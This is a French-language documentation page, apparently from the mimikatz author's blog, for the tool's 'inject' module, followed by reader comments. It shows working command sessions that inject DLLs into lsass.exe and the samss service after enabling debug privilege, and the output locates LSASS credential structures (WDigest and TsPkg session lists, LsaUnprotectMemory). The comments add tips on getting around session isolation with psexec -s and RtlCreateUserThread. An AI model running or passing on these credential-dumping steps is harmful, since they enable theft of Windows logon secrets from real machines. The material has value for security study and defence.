mimikatz :: inject

inject

j’aime injecter des librairies

Méthodes :

pid
process
service

pid

Description : Injecte une librairie Kiwi dans un processus identifié par son PID
Arguments : pid librairie.dll
Exemple : inject::pid 3256 kelloworld.dll

mimikatz # inject::pid 3256 kelloworld.dll
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

mimikatz # @ping
pong

mimikatz # @helloworld

kelloworld

process

Description : Injecte une librairie Kiwi dans un processus identifié par son nom
Remarque : Le nom du processus doit être unique
Arguments : processname.exe librairie.dll
Exemple : inject::process lsass.exe sekurlsa.dll

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 544
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getWDigestFunctions
** wdigest.dll/lsasrv.dll ** ; Statut recherche : OK :)

@pWDigestLogSessList = 000007FEFD2212C0
@LsaUnprotectMemory  = 000007FEFD8E8950

service

Description : Injecte une librairie Kiwi dans un processus identifié par son nom de service
Arguments : servicename librairie.dll
Exemple : inject::service samss sekurlsa.dll

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::service samss sekurlsa.dll
SERVICE(samss).serviceDisplayName = Gestionnaire de comptes de sécurité
SERVICE(samss).ServiceStatusProcess.dwProcessId = 544
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getTsPkgFunctions
** tspkg.dll/lsasrv.dll ** ; Statut recherche : OK :)

@TSCredTableLocateDefaultCreds = 000007FEFD1813FC
@LsaUnprotectMemory            = 000007FEFD8E8950

9 réflexions au sujet de « mimikatz :: inject »

Please, take a look to the following error:

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 592
Erreur : Impossible d'injecter ! ; (0x00000008) Not enough storage is available
to process this command.

The filesystem is not full. mimikatz.exe is in c:\temp and I can write in it. Could you help me, please?

Répondre ↓

Le 01/02/2012 à 16:54, gentilkiwi a dit :

Hi hiro,

It’s because you test it in terminal server session and on NT 5 box.
So use mimikatz by : psexec -s … to be in session 0, like lsass.exe
(or use it in console session ;))

It’s explained in msdn : « Terminal Services isolates each terminal session by design. Therefore, CreateRemoteThread fails if the target process is in a different session than the calling process. »
http://msdn.microsoft.com/library/windows/desktop/ms682437.aspx

On NT 6 I use a magic trick to bypass it :)

Répondre ↓
- Le 09/03/2012 à 08:50, Statham a dit :
  
  Perfect,Thxs

wow! and what’s the magic bypass for NT 6?
Also I suppose that the same trick does not work in NT 5, does it?

Thanks so much for your answer.

Répondre ↓

Le 01/02/2012 à 18:13, hiro a dit :

yeah! it works perfectly. Thxs

Répondre ↓
Le 01/02/2012 à 21:21, gentilkiwi a dit :

RtlCreateUserThread and no ; not the same behaviors on NT 5…

Répondre ↓